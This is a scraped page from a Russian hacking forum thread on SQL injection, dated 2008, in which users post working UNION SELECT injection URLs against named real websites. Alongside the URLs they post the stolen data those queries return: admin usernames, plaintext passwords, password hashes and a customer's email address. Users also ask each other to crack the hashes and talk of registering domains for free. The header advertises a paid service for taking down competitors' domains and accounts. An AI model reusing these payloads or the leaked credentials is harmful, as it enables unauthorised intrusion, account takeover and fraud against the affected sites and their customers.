Форум АНТИЧАТ - SQL Инъекции

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 725 из 1242

725

Опции темы

Поиск в этой теме

Опции просмотра

#7241

30.12.2008, 00:44

-m0rgan-

Постоянный

Регистрация: 29.09.2008

Сообщений: 553

Провел на форуме:
2584134

Репутация: 519

Отправить сообщение для -m0rgan- с помощью ICQ

jokester, сорри)
Исправляемся:
Сйт представляет услугу мониторинга seo-параметров, таких как
Индекс цетирования Yandex тИЦ
Индекс Google PageRank
Количество проиндексированных страниц в Yandex

Код:

http://www.seo-mon.com/news.php?id=-1+union+select+1,2,concat_ws(0x3a,user_id,nikname,lastname,firstname,secondname,email,login,password,register_time,status,type,register_id),4,5,6+from+users--

Логин/пасс:

Код:

tigranav:8791109100

--------------------------------------------------
The End!

#7242

30.12.2008, 01:37

ElteRUS

Постоянный

Регистрация: 11.10.2007

Сообщений: 406

Провел на форуме:
7215020

Репутация: 1423

purple.fr магазинчик

http://www.purple.fr/fashion.php?c=-7+union+select+1,concat_ws(0x2f,version(),database (),user())/*

5.0.32-Debian_7etch8-log/purple/purple@localhost

http://www.purple.fr/fashion.php?c=-7+union+select+1,group_concat(concat_ws(0x2f,login ,passwd))+from+user/*

root/6teutd7UL7NG.

http://www.purple.fr/fashion.php?c=-7+union+select+1,concat_ws(0x2f,email,passwd)+from +customer+limit+4200,1/*

felipe_e@hotmail.com/19l0ZUzMeK.b.

#7243

30.12.2008, 01:42

Gemini12

Познающий

Регистрация: 24.12.2008

Сообщений: 54

Провел на форуме:
253038

Репутация: 9

Отправить сообщение для Gemini12 с помощью ICQ

Код:

http://forparentssake.com/index.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,username,password),7,8+from+users--

aDMin:03110WoodBury

#7244

30.12.2008, 01:43

-m0rgan-

Постоянный

Регистрация: 29.09.2008

Сообщений: 553

Провел на форуме:
2584134

Репутация: 519

Вот кароче что я обкуренный нафигачил:

Код:

http://www.nairadomains.com/news.php?id=-1+union+select+1,unhex(hex(group_concat(table_name))),3,4,5+from+information_schema.tables--

Из таблицы tbladmins:

Код:

http://www.nairadomains.com/news.php?id=-1+union+select+1,unhex(hex(group_concat(table_name))),3,4,5+from+information_schema.tables--

А вот составить финальный запрос не получилось, как я токо не шифровал...((((

Кароче кто сможет, отпишитесь ниже(!!!), будем все домены на халяву регать=))))
------------------------------------------------------------
The End!

#7245

30.12.2008, 02:01

Red_Red1

Участник форума

Регистрация: 12.01.2007

Сообщений: 262

Провел на форуме:
4608122

Репутация: 874

Отправить сообщение для Red_Red1 с помощью ICQ

http://www.nairadomains.com/news.php?id=-1+union+select+1,unhex(hex(group_concat(concat(use rname,0x3A,password)))),3,4,5+from+naira_clients.t bladmins--
За group_concat - спасибо, незнал.

#7246

30.12.2008, 02:02

ElteRUS

Постоянный

Регистрация: 11.10.2007

Сообщений: 406

Провел на форуме:
7215020

Репутация: 1423

-m0rgan-, а финальный - это какой ?)

http://www.nairadomains.com/news.php?id=-1+union+select+1,concat_ws(0x2F,username,password) ,3,4,5+from+naira_clients.tbladmins

ADMIN/E7AA807F2B59DE7B73495FF59B30EC26

опередили, потрите плз )

#7247

30.12.2008, 02:04

masternet

Участник форума

Регистрация: 18.05.2008

Сообщений: 130

Провел на форуме:
1113633

Репутация: 155

Цитата:

Сообщение от -m0rgan-

Вот кароче что я обкуренный нафигачил:

Код:

http://www.nairadomains.com/news.php?id=-1+union+select+1,unhex(hex(group_concat(table_name))),3,4,5+from+information_schema.tables--

Из таблицы tbladmins:

Код:

http://www.nairadomains.com/news.php?id=-1+union+select+1,unhex(hex(group_concat(table_name))),3,4,5+from+information_schema.tables--

http://www.nairadomains.com/news.php?id=-1+union+select+1,concat_ws(char(32,45,32),username ,password),3,4,5+from+naira_clients.tbladmins--
элементарно,ватсон!
расшифруете хеш пмните мне)))

#7248

30.12.2008, 02:19

Gemini12

Познающий

Регистрация: 24.12.2008

Сообщений: 54

Провел на форуме:
253038

Репутация: 9

А мне он выдал

http://www.nairadomains.com/news.php?id=-1+union+select+1,concat_ws(0x3a,name,password),3,4 ,5+from+admins--

master:master

тока в админку не пускает (

#7249

30.12.2008, 02:21

Gemini12

Познающий

Регистрация: 24.12.2008

Сообщений: 54

Провел на форуме:
253038

Репутация: 9

Цитата:

Сообщение от masternet

И мне в ПМ плз!!!!

#7250

30.12.2008, 02:48

sabe

Постоянный

Регистрация: 16.03.2007

Сообщений: 380

Провел на форуме:
1404552

Репутация: 568

Отправить сообщение для sabe с помощью ICQ

Отправить сообщение для sabe с помощью AIM

Отправить сообщение для sabe с помощью Yahoo

Aattcottonbowl.com - PR5 ~2к

Цитата:

http://www.attcottonbowl.com/news_room/releases.php?uid=210'+union+select+1,2,3,4,5,email ,7,uid,9,10,11,12,13,version(),15,16+from+user+lim it+1,1/*

4 ветка.. подбирайте поля )

Страница 725 из 1242

725

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход